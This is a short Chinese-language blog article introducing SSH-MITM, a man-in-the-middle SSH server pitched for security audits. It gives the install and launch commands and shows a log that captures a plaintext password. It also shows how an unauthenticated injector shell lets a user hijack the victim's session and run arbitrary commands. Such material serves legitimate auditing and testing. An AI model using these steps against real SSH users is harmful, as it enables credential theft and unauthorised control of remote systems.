溫馨提示×
您好,登錄后才能下訂單哦!
點擊 登錄注冊 即表示同意《億速云用戶服務條款》
您好,登錄后才能下訂單哦!
這篇文章給大家分享的是有關SSH-MITM是什么工具的內容。小編覺得挺實用的,因此分享給大家做個參考,一起跟隨小編過來看看吧。
SSH-MITM服務器專為安全審計而設計,支持公鑰認證、會話劫持和文件篡改等功能。需要注意的是,該工具基于Python語言開發,因此需要在主機設備上安裝并配置好Python環境。
在使用任何軟件包之前,我們都需要進行正確的安裝。如需安裝SSH-MITM,我們只需要在設備上打開命令行終端,然后運行下列命令即可:
$ pip install ssh-mitm
SSH-MITM的使用非常簡單,如果需要密碼認證或會話劫持,只需要開啟攔截MITM-SSH服務器即可。打開命令行終端,然后運行下列命令:
$ ssh-mitm --remote-host 192.168.0.x
接下來,我們嘗試跟SSH-MITM服務器建立連接。SSH-MITM服務器會監聽10022端口:
$ ssh -p 10022 user@proxyserver
此時,我們將會看到憑證信息在日志中輸出:
2021-01-01 11:38:26,098 [INFO] Client connection established with parameters: Remote Address: 192.168.0.x Port: 22 Username: user Password: supersecret Key: None Agent: None
獲取明文憑證信息僅僅只是SSH-MITM的其中一個功能而已,當客戶端成功連接之后,SSH-MITM會開啟一個新的服務器,并用于會話劫持:
2021-01-01 11:42:43,699 [INFO] created injector shell on port 34463. connect with: ssh -p 34463 127.0.0.1
在劫持會話的時候,我們可以選擇自己喜歡的SSH客戶端。需要注意的是,這個連接不需要任何身份驗證:
$ ssh -p 34463 127.0.0.1
建立連接之后,你的會話只會通過最新的響應信息來更新,但是我們仍然可以執行任意命令。
接下來,我們就可以在劫持的會話或原始會話中嘗試執行某些命令了。
命令的執行結果將輸出顯示在兩個會話中。
感謝各位的閱讀!關于“SSH-MITM是什么工具”這篇文章就分享到這里了,希望以上內容可以對大家有一定的幫助,讓大家可以學到更多知識,如果覺得文章不錯,可以把它分享出去讓更多的人看到吧!
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。
